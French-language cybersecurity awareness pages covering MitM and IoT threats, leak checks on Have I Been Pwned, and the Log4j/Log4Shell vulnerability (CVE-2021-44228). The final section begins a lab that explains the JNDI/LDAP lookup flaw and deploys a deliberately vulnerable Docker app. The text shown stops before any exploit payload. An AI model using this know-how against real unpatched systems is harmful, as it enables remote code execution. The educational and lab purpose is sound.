<figure><img src="/files/kUHspEGKuWB3OqiQmxay" alt=""><figcaption></figcaption></figure>

***

## 4. Attaques MitM: L'interception sournoise

### **Description**

Les attaques de l'homme du milieu capturent la communication entre deux parties.

<figure><img src="/files/VJ0DuXuH7AekBBET9c5X" alt=""><figcaption></figcaption></figure>

### **Faits divers**

En 2017, une violation de données a été confirmée chez Equifax, exposant plus de 143 millions d'Américains. En conséquence, Equifax a créé un site web appelé equifaxsecurity2017.com pour permettre à ses clients de voir si la violation les concernait.

[**États-Unis : qu'est-ce que l'affaire Equifax, l'un des plus gros piratages de l'histoire ?**](https://www.rtl.fr/actu/international/etats-unis-qu-est-ce-que-l-affaire-equifax-l-un-des-plus-gros-piratages-de-l-histoire-7800073416)

### Protection

Liste non-exhaustive:

* Connexions HTTPS exclusivement.
* Évitez les Wi-Fi publics ou utilisez un VPN.
* Vérifiez les certificats des sites.

***

## 5. Vulnérabilités IoT: Les objets connectés à risque

### **Description**

L'internet des objets (IoT - Internet of Things) est la mise en réseau d'objets. Il est comparable à un réseau social ou à un fournisseur de courrier électronique, mais l'IoT relie des appareils plutôt que des personnes. Les experts de Business Insider s'attendent à ce que le nombre d'objets connectés atteigne 47 milliards d'ici à 2027.

<figure><img src="/files/qpTV4SyvwzufPAMMAlKu" alt=""><figcaption></figcaption></figure>

### **Faits divers**

[**L'attaque Mirai en 2016 a transformé des objets connectés en botnets, causant des perturbations majeures.**](https://www.lemonde.fr/pixels/article/2017/08/22/le-logiciel-mirai-responsable-de-plus-de-15-000-attaques_5175162_4408996.html)

### Protection

Liste non-exhaustive:

* Changez les mots de passe par défaut.
* Mise à jour régulière des appareils.
* Déconnectez les appareils inutilisés.

***

## Conclusion

La cybersécurité est un domaine en constante évolution. En restant informé et en adoptant des mesures de sécurité adaptées, vous pouvez vous prémunir contre les menaces majeures de 2023.


# Suis-je victime des fuites de données ?

<figure><img src="/files/ZZAcdyZAfikuZLCMBUC8" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
**Fuite de données**:\
Une fuite de données se produit lorsqu’une partie interne ou une source expose des données sensibles, généralement involontairement ou par accident. Les résultats d’une fuite de données peuvent aller de la perte d’informations à l’exploitation malveillante. Souvent, les fuites de données entraînent des [violations de données](https://www.fortinet.com/fr/resources/cyberglossary/data-breach).\
\
Source: **FORTINET**
{% endhint %}

Plusieurs d'entre nous ont été impliqués dans un fuite de données à un moment dans l'histoire, qu'il s'agisse de la grande faille de [**Linkedin en 2016**](https://www.lefigaro.fr/secteur/high-tech/2016/05/18/32001-20160518ARTFIG00292-plus-de-100-millions-de-mots-de-passe-linkedin-dans-la-nature.php) (et aussi en [**2021**](https://www.rtbf.be/tendance/techno/detail_fuites-de-donnees-sur-linkedin-comment-savoir-si-vos-informations-sont-concernees?id=10737668) pour le coup) ou de la plus récente de [**Facebook**](https://www.lemonde.fr/pixels/article/2021/04/05/cinq-questions-sur-la-fuite-de-donnees-concernant-plus-de-533-millions-de-comptes-facebook_6075616_4408996.html). C'est un fait inquiétant de la vie moderne : plusieurs d'entre nous, à un moment ou à un autre de notre vie en ligne, verront leurs données prises dans un piratage.

Si l'un de vos comptes en ligne a été piraté (on dit souvent qu'il a été "**pwned**"), il est important de ne pas paniquer. En suivant quelques étapes simples, vous pourrez vérifier l'ampleur des dégâts et reprendre le contrôle de la sécurité de votre compte.

![](/files/ewKU3TZLBsEQDlA7GrtH)

{% hint style="info" %}
**Pwned:** Désigne une personne qui s’est fait battre platement dans un jeu vidéo ou qui s’est fait avoir en ligne. Il a également été utilisé pour décrire l'acte d'obtenir un accès illégal à quelque chose.

Définition: [**Wiktionary**](https://fr.wiktionary.org/wiki/pwned)
{% endhint %}

Pwned, dans ce contexte, signifie simplement que votre compte a été victime d'une fuite de donnée&#x73;**.**

Les fuites de données existent et c'est l'un des effets secondaires malheureux du monde moderne, connecté à Internet. Et souvent, elles n'ont rien à voir avec le fait que vous, simple utilisateur sans problème, soyez irresponsable. Les entreprises peuvent subir des fuites de données embarrassantes, que ce soit à la suite d'un piratage de leurs serveurs, d'une erreur humaine ou d'une faute du personnel.

Avec un tel nombre de fuites et l'intensification des cyberattaques durant cette année de crise, on peut être amené à se poser la question suivante:&#x20;

{% hint style="danger" %}
**Comment puis-je savoir que mes données ont fuité?**
{% endhint %}

Le site le plus connu pour vérifier si votre adresse électronique, ou tout compte qui lui est associé, a été piraté, s'appelle **Have I Been Pwned**.

## Have I been pwned ?

{% hint style="success" %}
[**Have I Been Pwned ?**](https://haveibeenpwned.com/) est un site web qui permet aux utilisateurs de vérifier si leurs données personnelles ont été compromises par des fuites de données.
{% endhint %}

La principale fonction de ce site, depuis son lancement, est de fournir au grand public un moyen de vérifier si ses informations privées ont été divulguées ou compromises. Les visiteurs du site Web peuvent saisir une adresse électronique ou un numéro de téléphone et voir une liste de toutes les fuites de données connues avec des enregistrements liés à cette adresse électronique.&#x20;

Le site Web fournit également des détails sur chaque fuite de données, comme l'historique de la perte et les types de données spécifiques qu'elle contenait.

### Vérification de mes données

![La page d'accueil du site web](/files/UtZm4Hc7ioEP36fm1TJF)

#### <mark style="color:purple;">1) Tout d'abord, il faut introduire son adresse mail (ou son numéro de téléphone avec indicateur: BE=+32, FR=+33,...) dans la barre de recherche:</mark>

![Introduire son adresse mail et puis cliquer sur pwned?](/files/8oNrZp4vPBUTrXSTu3FN)

#### <mark style="color:purple;">2) Si le message "Oh no - pwned!" apparaît, votre adresse mail est bien compromise:</mark>

![L'adresse mail est bien compromise](/files/BecMtsZd5hb2Bpz9lLUe)

<mark style="color:red;">**⚠ L'adresse mail "<test@test.com>" est présente dans 372 fuites de données et 1394 pastes (collages).**</mark>

{% hint style="info" %}
**Paste (collage)**: Un "collage" est une information qui a été ajouté (collé) sur un site Web public conçu pour partager du contenu, tel que Pastebin.

Définition:  [HaveIBeenPwned?](https://haveibeenpwned.com/Pastes)
{% endhint %}

Souvent, lorsque les services en ligne sont compromis, les premiers signes apparaissent sur les sites de "collage" comme [**Pastebin**](https://pastebin.com/). Les attaquants publient fréquemment des échantillons ou des vidages complets de données compromises sur ces services.&#x20;

![Exemple de collage d'une base de données sur Pastebin](/files/2um2vrn4RLUDAyejaE0V)

La surveillance et le signalement de la présence d'adresses électroniques sur des sites comme Pastebin peuvent donner aux utilisateurs concernés une longueur d'avance pour atténuer les retombées potentielles d'une fuite de données.

#### <mark style="color:purple;">3) Les fuites de données sont variées car elles proviennent de plusieurs compagnies différentes. Voici quelques exemples:</mark>

![Un exemple de données compromises pour test@test.com](/files/JGBqBMYOSGbMbXSAOFOC)

<mark style="color:red;">**⚠ Les données liées à <Test@test.com> ont fuité via Linkedin et Linux Forums (liste non-exhaustive).**</mark>

Dans l'exemple ci-dessus, les données qui ont fuité sont:

* Adresses mail
* Mots de passes
* Niveau d'éducation
* Localisation Géographique
* Titre du job
* Nom et prénom
* Adresses IP
* Pseudos

![](/files/6mQf9N2IMC3jWroyXRzB)

Effectivement, si vous n'avez pas de données sur le net, vous ne risquez aucune fuite. Mais êtes-vous sûr(e) que votre adresse mail n'est lié à aucun compte ?&#x20;

Si au contraire vous avez un ou plusieurs comptes et que certains ont fuités, voici comment réagir au mieux et se protéger.

## Comment réagir et se protéger&#x20;

S'il est important de savoir si vos données personnelles ou vos informations d'identification ont été divulguées, il est encore plus important d'agir en conséquence. Que devez-vous faire maintenant, sachant que votre compte a été compromis ?

### Modifier vos mots de passe.

Connectez-vous au compte compromis et changez le mot de passe. Si une question de sécurité est activée pour le changement de mot de passe, répondez-y, obtenez un nouveau mot de passe et changez également la question de sécurité.&#x20;

Ensuite, mettez à jour les mots de passe de tous les comptes pour lesquels vous avez utilisé la même combinaison de login et de mot de passe. Ne réutilisez pas les mots de passe ; veillez à en choisir des différents pour chaque compte.

### Ajouter la double authentification.&#x20;

L'idée de la double authentification est qu'en plus de votre mot de passe, vous devrez fournir une preuve d'identité supplémentaire, comme un code secret envoyé sur votre téléphone. De cette façon, si votre compte est un jour piraté, les cybercriminels ne pourront pas y accéder en utilisant uniquement votre mot de passe.

### Surveiller les paiements liés aux comptes.&#x20;

Vérifiez les comptes appropriés liés aux données d'achat, sites d'achat ou simplement votre compte bancaire, pour toute commande que vous ne vous souvenez pas avoir passée. Plus vite vous les trouverez, plus vous aurez de chances d'annuler ces commandes avec succès.

### Informer votre banque pour qu'elle arrête votre carte.&#x20;

Appelez d'abord votre banque, puis envoyez un courriel pour avoir une preuve de votre rapport.

### Vérifier votre relevé de carte pour détecter les transactions suspectes.&#x20;

Prévenez en outre la banque s'il y a des paiements que vous n'avez pas autorisés.

## Rester à jour

Afin de se préserver un maximum des cybercrimes liés aux fuites de données, il faut se tenir au courant et réagir rapidement.&#x20;

### Activer la notification sur Have I been Pwned?

La fonction première de Have I Been Pwned est de vous dire si vos informations ont été compromises. Mais d'autres outils ont été mis à disposition comme la notification.

![Pour activer les notifications](/files/f9VnyWZg5hPUOhow80us)

Vous pouvez vous inscrire pour recevoir une notification par courrier électronique chaque fois que vos informations personnelles sont découvertes dans une nouvelle fuite de données. Cela vous permettra de prendre des mesures pour minimiser le risque de fraude ou d'usurpation d'identité, par exemple en changeant votre mot de passe pour ce compte et pour tout autre compte pour lequel vous avez utilisé le même mot de passe.

![Indiquer votre adresse mail](/files/pfSFuBaYRWSyzCVQ6RMQ)

![Un mail de vérification est envoyé sur votre boîte de réception, il faut cliquer sur le lien pour confirmer](/files/MCYgq1xyj3cpsUMTgRaZ)

### Vérifier le mot de passe

La réutilisation des mots de passe est normale. C'est extrêmement risqué, mais c'est pourtant si courant parce que c'est facile et que les gens ne sont pas conscients de l'impact potentiel.

Have I Been Pwned? a mis en place un outil appelé "**Pwned Password**".&#x20;

Cet outil contient une liste de mots de passe piratés.

![](/files/iP2IwYLfiXfxRxGwRnrd)

Les mots de passe piratés sont 613 584 246 mots de passe du monde réel précédemment exposés lors de fuites de données. Cette exposition les rend impropres à une utilisation permanente, car ils risquent beaucoup plus d'être utilisés pour prendre le contrôle d'autres comptes.&#x20;

#### Exemples

Avec les mots de passe suivants:

* <mark style="color:red;">**Test123**</mark>

![](/files/cTIsWVlxEIfg1Fin0jm5)

Le mot de passe a été vu dans des fuites de données 4703 fois.

* <mark style="color:green;">**Ln8}fE9m-Z!s**</mark>

![](/files/bUwwIAFYid9H6JOqMlKp)

Le mot de passe ne se trouve dans aucune fuite de données connue à ce jour.&#x20;


# LOG4J: La librairie vulnérable qui secoue la planète

Le 9 décembre 2021, une vulnérabilité critique, qui affecte le paquet de **journalisation Java log4j**, a été découverte.

Cette faille de cybersécurité récemment découverte affecte de vastes zones de l'internet, depuis Google et Amazon jusqu'aux systèmes utilisés pour faire fonctionner les armées et les hôpitaux. La haute  responsable de la cybersécurité du ministère américain de la sécurité intérieure, [**Jen Easterly**](https://en.wikipedia.org/wiki/Jen_Easterly), a qualifié cette faille de vulnérabilité la plus grave depuis des décennies.

La plupart des tentatives de piratage utilisant Log4j jusqu'à présent ont impliqué des attaquants essayant d'installer un logiciel de "minage" de crypto-monnaies sur les ordinateurs des victimes.&#x20;

Cependant, certains groupes de hacker ont également essayé d'utiliser cette vulnérabilité pour pénétrer dans des agences gouvernementales et des entreprises d'autres pays, selon la société de cybersécurité Check Point.

## Définitions

Tout d'abord quelques définitions pour ne pas vous perdre dans certains mots plus techniques présents dans la suite de cette article :smile:

{% tabs %}
{% tab title="JAVA" %}
Java est une technique informatique développée initialement par [Sun Microsystems](https://fr.wikipedia.org/wiki/Sun_Microsystems) puis acquise par [Oracle](https://fr.wikipedia.org/wiki/Oracle_\(entreprise\)) à la suite du rachat de l'entreprise. Défini à l'origine comme un [langage de programmation](https://fr.wikipedia.org/wiki/Langage_de_programmation), Java a évolué pour devenir un ensemble cohérent d'éléments techniques et non techniques. Ainsi, la technologie Java regroupe :

* Des standards&#x20;
* Des logiciels
* Des communautés d'entreprises

&#x20;                       &#x20;

Définition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Java_\(technique\))
{% endtab %}

{% tab title="Journalisation" %}
La **journalisation** peut désigner en [informatique](https://fr.wikipedia.org/wiki/Informatique) :

* la [journalisation d'un système de fichiers](https://fr.wikipedia.org/wiki/Journal_\(syst%C3%A8me_de_fichiers\)) permettant à celui-ci de récupérer plus rapidement d'un arrêt brutal du système
* la [journalisation d'un système](https://fr.wikipedia.org/wiki/Historique_\(informatique\)) qui est la sauvegarde des évènements sortant de l'ordinaire

Définition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Journalisation)
{% endtab %}

{% tab title="LOG4J" %}
**Log4j** est une [bibliothèque logicielle](https://fr.wikipedia.org/wiki/Biblioth%C3%A8que_logicielle) utilitaire [open source](https://fr.wikipedia.org/wiki/Open_source) programmée en langage [Java](https://fr.wikipedia.org/wiki/Java_\(langage\)). Elle fait partie de [Apache Logging](https://fr.wikipedia.org/wiki/Apache_Logging) Services, un projet de l'[Apache Software Foundation](https://fr.wikipedia.org/wiki/Apache_Software_Foundation). Elle fournit des fonctions permettant de gérer des traces et des [historiques d'applications](https://fr.wikipedia.org/wiki/Historique_\(informatique\)).

Elle est utilisée dans de très nombreuses [applications web](https://fr.wikipedia.org/wiki/Applications_web) et [services web](https://fr.wikipedia.org/wiki/Services_web) programmés en langage JAVA.

Définition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Log4j)
{% endtab %}
{% endtabs %}

## Prémices&#x20;

À l'heure actuelle, la plupart d'entre vous ont peut-être déjà entendu parler de la vulnérabilité de sécurité de Log4j ([**CVE-2021-44228**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228)), qualifiée de "vulnérabilité la plus importante et la plus critique de la dernière décennie", et ont peut-être travaillé à la protection de leur organisation contre cette vulnérabilité.&#x20;

Selon un [**rapport de TechSpot**](https://www.techspot.com/news/92633-hackers-launch-over-840000-attacks-through-log4j-flaw.html), plus de 840 000 attaques ont été lancées dans les 72 heures suivant la divulgation de la vulnérabilité et le nombre d'attaques a atteint plus de 100 par minute pendant le week-end.

Cela montre clairement pourquoi tout le monde s'empresse de déployer le correctif pour la vulnérabilité Log4J.

Et vous êtes en train de vous dire:

> " C'est bien beau tout ça, mais on comprend pas forcément en quoi consiste cette vulnérabilité et pourquoi est-elle si dangereuse ?"

Tout à fait et on y vient, je vais découper l'article en deux partie pour mieux vous expliquer:

* La vulnérabilité LOG4J pour ceux qui veulent savoir mais sans entrer dans les détails
* La vulnérabilité LOG4J pour ceux qui veulent savoir, comprendre et vaincre la faille (explications plus techniques et approfondies)

![](/files/KZFd5OK6Lyj4sZ1hSzRo)

## Vulnérabilité LOG4J: Un peu mais pas trop

J'ai eu la question suivante d'un ami qui ne connaît rien à l'informatique:

> Peux-tu m'expliquer ce qui s'est passé pour que toutes les compagnies aient peur à ce point ?

J'ai essayé par tous les moyens de trouver des mots simples pour lui expliquer mais pour faire comprendre à quelqu'un de non-technique une vulnérabilité liée à une librairie JAVA...

![Mon cerveau pendant la réflexion](/files/3FZuig2s0gQ71eyoHWs9)

Je lui ai envoyé des vidéos et tutos mais ça restait toujours trop technique pour lui.&#x20;

Heureusement, un ancien collègue [ANDREA BARRACU](https://hakin9.org/log4shell-explained-to-your-non-technical-friend-by-andrea-barracu/) a pu trouver les mots pour expliquer tout ça avec un exemple simple et efficace.

### Histoire de vis

Un jour, un producteur de vis super célèbre a lancé une nouvelle gamme pratique et efficace pour tout type d'utilisations, et surtout GRATUIT ! Les vis et leur mode d'emploi sont donc utilisés par tout le monde: Grandes, moyennes et petites entreprises ainsi que les bricoleurs amateurs.&#x20;

Ces vis étaient donc partout: Portes, chaises, tables, serrures, coffres-forts,... Puisqu'elles étaient gratuites, bien faites et apparemment sûres.

![Les vis en question ! (Ceci est un exemple imagé) ](/files/efujlCoVb79APm6Fg0Ji)

Tout allait bien dans le meilleur des mondes, jusqu'au jour où un homme a découvert un moyen de dévisser chaque vis sans tournevis mais à distance via un aimant puissant. Il a publié sa découverte sur Twitter et beaucoup de gens ont abusé de la faille.&#x20;

![SUPER AIMANT ](/files/reImAc12MKNlszO9m9OU)

Rappelez vous que les vis sont partout et donc toutes les personnes qui comprenaient comment l'aimant fonctionnait, pouvaient forcer toutes les portes qui utilisaient ces vis en question. Bien évidemment certaines portes étaient plus robustes que d'autres et résistaient aux attaques mais d'autres succombaient très facilement. Les portes n'étaient pas les seules cibles vu que les vis étaient aussi dans les coffres, chaises, tiroirs,...

L'exploitation de la faille est tellement simple que maintenant chaque attaquant autour du bureau pourrait ouvrir toutes les portes et tous les tiroirs sans trop d'effort.&#x20;

Ce type de vis est utilisé dans un grand nombre d'endroits et d'infrastructure ce qui rend le problème ENORME.

D'un jour à l'autre, de nombreuses entreprises n'étaient plus sûres. Une armée de bricoleurs a commencé à corriger et à remplacer cette marque de vis par une nouvelle, en essayant d'être plus rapide que celui qui aurait tenté d'exploiter la situation.

![](/files/74GMOjozWbMr84BvEzU5)

C'est donc la panique qui débute car il y a beaucoup trop de vis. Il y a celles qui sont difficiles à changer parce qu'elles sont en place depuis toujours et celles qui ont été oubliées car elles sont perdues entre anciennes et nouvelles vis.

Les entreprises, souvent, ont perdu les détails de la vis spécifique qu'elles ont utilisées et donc c'est un problème aussi.&#x20;

Certaines vis étaient également utilisées dans les murs porteurs des bâtiments et sont donc intouchables au risque de tout faire écrouler.

### LOG4J et les vis

Dans notre histoire ci-dessus, vous l'avez bien compris les vis font allusion à la librairie LOG4J.

Log4j est utilisé par les développeurs pour garder une trace de ce qui se passe dans leurs applications logicielles ou leurs services en ligne. Il s'agit en fait d'un énorme journal de l'activité d'un système ou d'une application. Cette activité est appelée "journalisation" et est utilisée par les développeurs pour garder un œil sur les problèmes des utilisateurs.

Cette libraire était donc disponible gratuitement et utilisé partout. Cela rend donc la tâche compliquée à toutes les entreprises et utilisateurs car il faut retrouvé les endroits impactés par la faille.&#x20;

La faille possède le nom de **LOG4SHELL** (explication détaillée dans la partie technique) et donne donc des accès à distances aux infrastructures.

![Image qui fait peur ](/files/Pi4ytb4zgdvBnnXKiwWA)

Le fournisseur de la libraire, APACHE Foundation, a sorti une version 2.17.1 pour patcher le problème.

{% tabs %}
{% tab title="Patcher" %}
*Informatique.* Développer un correctif logiciel permettant de remédier à un dysfonctionnement.

Définition: [**CORDIAL.FR**](https://www.cordial.fr/dictionnaire/definition/patcher.php)
{% endtab %}
{% endtabs %}

### Impact & Cibles

La vulnérabilité de sécurité de log4j permet aux attaquants d'exécuter du code malveillant à distance sur un ordinateur cible. Autrement dit, les mauvais acteurs (pirates) peuvent facilement voler des données, installer des logiciels malveillants ou simplement prendre le contrôle d'un système via Internet.

Tous les systèmes et services qui utilisent la bibliothèque de journalisation Java, Apache Log4j entre les versions 2.0 et 2.15 sont impactés. Cela inclut entre autre ***Atlassian, Amazon, Microsoft Azure, Cisco, Commvault, Dell, Exact, Fortinet, JetBrains, Nelson, Nutanix, OpenMRS, Oracle, Red Hat, Splunk, Soft et VMware***.&#x20;

Vous pouvez consulter la liste complète des logiciels vulnérables et leur statut de sécurité sur le github de "[**Nationaal Cyber Security Centrum (NCSC-NL)**](https://github.com/NCSC-NL/log4shell/blob/main/software/software_list.md)" ou de [**SwitHak**](https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592).

## Conclusion

En résumé, la librairie Log4j est présente en gros nombre dans les infrastructures des entreprises et leurs écosystèmes. Ceci rend donc la tâche très compliquée car il faut retrouver tous les endroits susceptible d'utiliser les librairies avec une version vulnérable et d'avoir les outils nécessaires pour corriger les erreurs.&#x20;

**Pour toutes les personnes concernées, il existe un impératif à la fois commercial et moral de prendre des mesures immédiates pour atténuer la vulnérabilité si elle existe dans les systèmes destinés au public.** Naturellement, aucune entreprise ne souhaite que ses systèmes soient vulnérables à une attaque pouvant entraîner l'altération ou le vol de données et le risque d'une grave perturbation de l'activité.

Chaque organisation devrait disposer d'un plan d'atténuation au cas où une telle situation se reproduirait à l'avenir. Qu'il s'agisse de fermer le logiciel incriminé ou de le corriger immédiatement et de tester le correctif avant de le remettre en production, les équipes doivent être prêtes à réagir de manière proactive en quelques heures, voire quelques minutes.

Il est temps d'aller vous faire un café et de vous lancer dans la[ **partie technique**](/french/articles/log4shell-veni-vidi-vici) !

![Votre cerveau en ce moment même !](/files/NF0Yw1UkNwB1iVYEtIL3)


# LOG4SHELL: VENI,VIDI,VICI

La vulnérabilité **LOG4J**, aussi appelé **LOG4SHELL**, est critique et elle affecte Apache Log4j versions 2.0 à 2.14.1. Elle a été identifiée par Chen Zhaojun de l'équipe de sécurité d'Alibaba Cloud.&#x20;

Le **NIST** a publié un **CVE** critique dans la "*National Vulnerability Database*" le 10 décembre 2021, sous le nom de [**CVE-2021-44228**](https://nvd.nist.gov/vuln/detail/CVE-2021-44228). &#x20;

Apache Software Foundation a attribué la note de gravité CVSS maximale de 10.

{% tabs %}
{% tab title="NIST" %}
Le "**National Institute of Standards and Technology"** (NIST) est une agence gouvernementale non réglementaire qui développe des technologies, des mesures et des normes pour stimuler l'innovation et la compétitivité économique des organisations basées aux États-Unis dans le secteur des sciences et des technologies. Dans le cadre de cet effort, le NIST produit des normes et des directives pour aider les agences fédérales à répondre aux exigences de la loi fédérale sur la gestion de la sécurité des informations (FISMA). Le NIST aide également ces agences à protéger leurs informations et leurs systèmes d'information par le biais de programmes rentables.

SOURCE: [**NIST.GOV**](https://www.nist.gov/)
{% endtab %}

{% tab title="CVE" %}
L'acronyme CVE, pour Common Vulnerabilities and Exposures en anglais, désigne une liste publique de failles de sécurité informatique. Lorsque l'on parle d'une CVE, on fait généralement référence à une faille de sécurité à laquelle un identifiant CVE a été attribué.

Les avis de sécurité publiés par les fournisseurs et chercheurs mentionnent presque toujours au moins un identifiant CVE. Les CVE aident les professionnels à coordonner leurs efforts visant à hiérarchiser et résoudre les vulnérabilités, et ainsi renforcer la sécurité des systèmes informatiques.

\
SOURCE: [**REDHAT**](https://www.redhat.com/fr/topics/security/what-is-cve)
{% endtab %}

{% tab title="CVSS" %}
Le système **CVSS** (**Common Vulnerability Scoring System**) permet de saisir les principales caractéristiques d'une vulnérabilité et de produire un score numérique reflétant sa gravité. Ce score numérique peut ensuite être traduit en une représentation qualitative (telle que faible, moyenne, élevée et critique) afin d'aider les organisations à évaluer et à hiérarchiser correctement leurs processus de gestion des vulnérabilités.

CVSS est une norme publiée utilisée par des organisations du monde entier, et la mission du SIG est de continuer à l'améliorer.

SOURCE: [**FIRST.ORG**](https://www.first.org/cvss/)
{% endtab %}
{% endtabs %}

## VENI

### Origine

Le CVE-2021-44228 provient d'un endroit improbable: [**MINECRAFT**](https://www.minecraft.net/fr-fr). Minecraft est un jeu très populaire développé par les studios Mojang où les gens peuvent interagir librement avec un environnement 3D entièrement modifiable.

![Un article intéressant de ezpublish-france.fr: Minecraft lance un correctif pour la vulnérabilité critique de Log4j](/files/Bo56yRlNU2WexQR9iP1o)

La fonction de chat du jeu est à l'origine de l'exploit. L'application de communication, exécutant une api java avec la version spécifique de log4j, a permis à des acteurs malveillants de bloquer des machines, d'expulser tous les joueurs, etc.&#x20;

Dans les bonnes circonstances, il est également possible d'exécuter du code à distance via cet exploit, c'est pourquoi il est si dangereux et a été marqué "**zero-day**" ou "**0-day**".

{% tabs %}
{% tab title="Zero-day/0-day" %}
« Zero-day » est un terme générique qui décrit les dernières vulnérabilités de sécurité détectées que les cybercriminels peuvent utiliser pour attaquer les systèmes. Le terme « zero-day » désigne le fait que le fournisseur ou le développeur vient de prendre connaissance de la faille, ce qui signifie qu’il a « zéro jour » pour la corriger. Une attaque zero-day survient lorsque les cybercriminels exploitent la faille avant que les développeurs n’aient la possibilité de la rectifier.

Définition: [**KASPERSKY**](https://www.kaspersky.fr/resource-center/definitions/zero-day-exploit)
{% endtab %}
{% endtabs %}

### Cause

La raison de ce problème est la mauvaise utilisation de l'interpolation de variables et de la bonne vieille api **JNDI**, qui existe en Java depuis des lustres.

En général, les développeurs de logiciels utilisent un mécanisme de journalisation pour faire état des différents flux au sein du logiciel. Au cours de ce processus, un message de journal est transmis sous forme de chaîne de caractères à enregistrer dans un fichier de journal.&#x20;

La bibliothèque Log4j possède une fonctionnalité supplémentaire qui permet aux messages de journal de contenir des variables qui sont traduites à la volée avant d'être écrites dans un fichier de journal. Dans le cas de CVE-2021-44228, log4j traduit un argument spécifique reçu sous la forme d'une chaîne formatée et le force à charger un code Java provenant d'une autre classe Java stockée sur le serveur ou d'un serveur distant.

Log4j2 supporte par défaut une fonctionnalité de journalisation appelée "Message Lookup Substitution". Cette fonctionnalité permet à certaines chaînes spéciales d'être remplacées, au moment de la journalisation, par d'autres chaînes générées dynamiquement. Par exemple, l'enregistrement de la chaîne ***`Running ${java:runtime}`*** produira un résultat similaire à celui qui suit :

> <mark style="color:red;">**Running Java version 1.7.0\_67**</mark>

Il a été découvert que l'une des méthodes de recherche, en particulier la recherche **JNDI** associée au protocole **LDAP**, récupère une classe Java spécifique à partir d'une source distante et la désérialise, en exécutant une partie du code de la classe au cours du processus.

### LDAP & JNDI

Avant d'appendre comment exploiter la vulnérabilité, il faut expliquer et comprendre deux mots clés: **LDAP** et **JNDI**.

#### LDAP

Le protocole LDAP (Lightweight Directory Access Protocol) est un protocole qui permet aux applications d'interroger rapidement les informations relatives aux utilisateurs.

Les entreprises stockent les noms d'utilisateur, les mots de passe, les adresses électroniques, les connexions d'imprimante et d'autres données statiques dans des répertoires.&#x20;

LDAP est un protocole d'application ouvert, neutre vis-à-vis des fournisseurs, qui permet d'accéder à ces données et de les conserver. LDAP peut également prendre en charge l'authentification, de sorte que les utilisateurs peuvent se connecter une seule fois et accéder à de nombreux fichiers différents sur le serveur.

Dans une entreprise, l'employé moyen se connecte et interroge le serveur LDAP des centaines de fois par jour. À première vue, cette personne ne sait peut-être même pas qu'elle contacte le serveur LDAP, mais une série d'étapes complexes sont suivies pour effectuer une simple requête.

![Fonctionnement de LDAP (SOURCE: OTKA)](/files/u6GnYMWc8d8ywxRRGQfZ)

Pour qu'un LDAP réussisse une requête, les étapes suivantes sont généralement suivies :

1. **Connexion à la session** : L'utilisateur se connecte au serveur LDAP via un port LDAP (généralement le port TCP/389).
2. **Requête** : L'utilisateur envoie la requête au serveur LDAP. Il peut s'agir par exemple d'une recherche de courrier électronique.
3. **Réponse** : Le protocole LDAP recherche dans l'annuaire les informations pertinentes et les fournit à l'utilisateur.
4. **Achèvement** : Après avoir reçu la réponse, l'utilisateur se déconnecte du port LDAP.

Les étapes de la requête LDAP peuvent sembler simples, mais en fait, beaucoup de travail a été fait pour rendre ce processus transparent, et une bonne quantité de codes a été effectuée pour rendre ces fonctions possibles.

#### JNDI

JNDI signifie *Java Naming and Directory Interface* et est une API JAVA.

Cette API permet :

* d’accéder à différents services de nommage ou de répertoire de façon uniforme ;
* d'organiser et rechercher des informations ou des objets par nommage (*java **naming** and directory interface*) ;
* de faire des opérations sur des annuaires (*java naming and **directory** interface*) tels que :
  * LDAP: un annuaire léger
  * DNS: *Domain Name System* ou *DNS* est un service informatique distribué utilisé qui traduit les noms de domaine Internet en adresse IP ou autres enregistrements

Quelques points concernant l'architecture JNDI :&#x20;

![](/files/AnuJdLIvWe3gWsOtbW4z)

Dans ce tableau, vous pouvez voir les niveaux de l'architecture.&#x20;

* Tous les niveaux de l'architecture sont connectés à l'application java.&#x20;
* L'API fournit un mécanisme pour lier un objet à un nom et pour accéder aux services de nommage et d'annuaire.&#x20;
* Le SPI permet de brancher les services de nommage et d'annuaire de manière transparente.&#x20;
* Le dernier niveau montre les répertoires qui sont connectés à l'interface.

## VIDI

### Environnement de test

Pour l'environnement de test, ce que j'utilise personnellement:&#x20;

* **Logicielle de Virtualisation:** [VirtualBox](https://www.virtualbox.org/) ou [VMware](https://www.vmware.com/)
* **Machine Virtuelle:** [Kali Linux](https://www.kali.org/get-kali/#kali-virtual-machines)

Pour mettre en place un serveur exécutant une version vulnérable de la bibliothèque Log4j, nous allons construire une image Docker pour cette application [Spring Boot](https://spring.io/projects/spring-boot) créée par [*<mark style="color:purple;">**christophetd**</mark>* ](https://github.com/christophetd)qui est vulnérable à l'exploitation Log4Shell.&#x20;

Tout d'abord il faut installer [Docker ](https://www.kali.org/docs/containers/installing-docker-on-kali/)sur la machine Kali Linux.

Maintenant il faut construire une image qui comprendra toutes les dépendances et le code source de l'application Java vulnérable.

* Copier le répertoire GITHUB de christophetd dans le dossier /tmp

{% hint style="success" %} <mark style="color:green;">**git**</mark> clone <https://github.com/christophetd/log4shell-vulnerable-app.git> /tmp/log4shell-vulnerable-app
{% endhint %}

![](/files/YsuG61UtzjmLBV7ZE6cP)

* Rentrer dans le dossier

{% hint style="success" %} <mark style="color:green;">**cd**</mark> /tmp/log4shell-vulnerable-app
{% endhint %}

![](/files/pdffmHdt4RuGaZYSrhnj)

* Construire l'image

{% hint style="success" %} <mark style="color:green;">**sudo docker**</mark> build <mark style="color:purple;">**-t**</mark> log4shell-app .
{% endhint %}

![](/files/61hfaxkrS9ZrFb4N5VrI)

{% hint style="success" %} <mark style="color:green;">**sudo docker**</mark> run <mark style="color:purple;">**-it --network=host --name**</mark> log4shell-app log4shell-app&#x20;
{% endhint %}

![](/files/VfngymxcKhZn64ezWkyb)

Maintenant, il y a une instance de l'application vulnérable disponible sur **localhost:8080**. Il est possible de le vérifier avec la commande suivante:

{% hint style="success" %} <mark style="color:green;">**sudo lsof**</mark> <mark style="color:purple;">**-i -P -n**</mark> <mark style="color:blue;">|</mark> <mark style="color:green;">**grep**</mark> LISTEN
{% endhint %}

![](/files/M1VYXNwvfbXF1fjf8FHQ)

